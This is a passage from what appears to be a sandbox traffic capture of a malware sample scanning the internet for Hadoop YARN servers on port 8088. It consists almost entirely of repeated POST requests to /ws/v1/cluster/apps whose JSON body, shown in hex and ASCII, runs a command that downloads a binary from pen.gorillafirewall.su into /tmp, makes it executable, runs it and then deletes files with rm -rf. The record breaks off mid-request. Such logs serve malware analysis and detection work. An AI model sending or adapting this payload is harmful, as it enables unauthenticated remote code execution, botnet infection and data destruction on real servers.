                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                14192.168.2.2337442187.125.238.1338088
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Sep 12, 2024 00:37:56.837558031 CEST362OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 187.125.238.133:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                15192.168.2.235263433.247.222.2468088
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Sep 12, 2024 00:37:59.839138031 CEST361OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 33.247.222.246:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                16192.168.2.2358836182.203.244.1038088
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Sep 12, 2024 00:38:02.841063976 CEST362OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 182.203.244.103:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                17192.168.2.2341508114.142.230.938088
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Sep 12, 2024 00:38:05.842643023 CEST361OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 114.142.230.93:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                                                                                                Sep 12, 2024 00:38:06.124245882 CEST361OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 114.142.230.93:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                                                                                                Sep 12, 2024 00:38:06.412020922 CEST361OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 114.142.230.93:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                                                                                                Sep 12, 2024 00:38:06.955971956 CEST361OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 114.142.230.93:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                18192.168.2.2346942208.35.19.1718088
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Sep 12, 2024 00:38:08.843389988 CEST360OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 208.35.19.171:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                                                                                                Sep 12, 2024 00:38:10.571475029 CEST360OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 208.35.19.171:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                                                                                                Sep 12, 2024 00:38:13.035145044 CEST360OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 208.35.19.171:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                19192.168.2.2335222118.143.223.558088
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Sep 12, 2024 00:38:17.849370956 CEST361OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 118.143.223.55:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                                                                                                Sep 12, 2024 00:38:19.306299925 CEST361OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 118.143.223.55:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                                                                                                Sep 12, 2024 00:38:21.194071054 CEST361OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 118.143.223.55:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                20192.168.2.2333516157.173.158.1868088
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Sep 12, 2024 00:38:23.852659941 CEST362OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 157.173.158.186:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                                                                                                Sep 12, 2024 00:38:25.257540941 CEST362OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 157.173.158.186:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                                                                                                Sep 12, 2024 00:38:27.049277067 CEST362OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 157.173.158.186:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                21192.168.2.235291461.221.100.1068088
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Sep 12, 2024 00:38:32.861535072 CEST361OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 61.221.100.106:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                                                                                                Sep 12, 2024 00:38:33.896344900 CEST361OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 61.221.100.106:8088
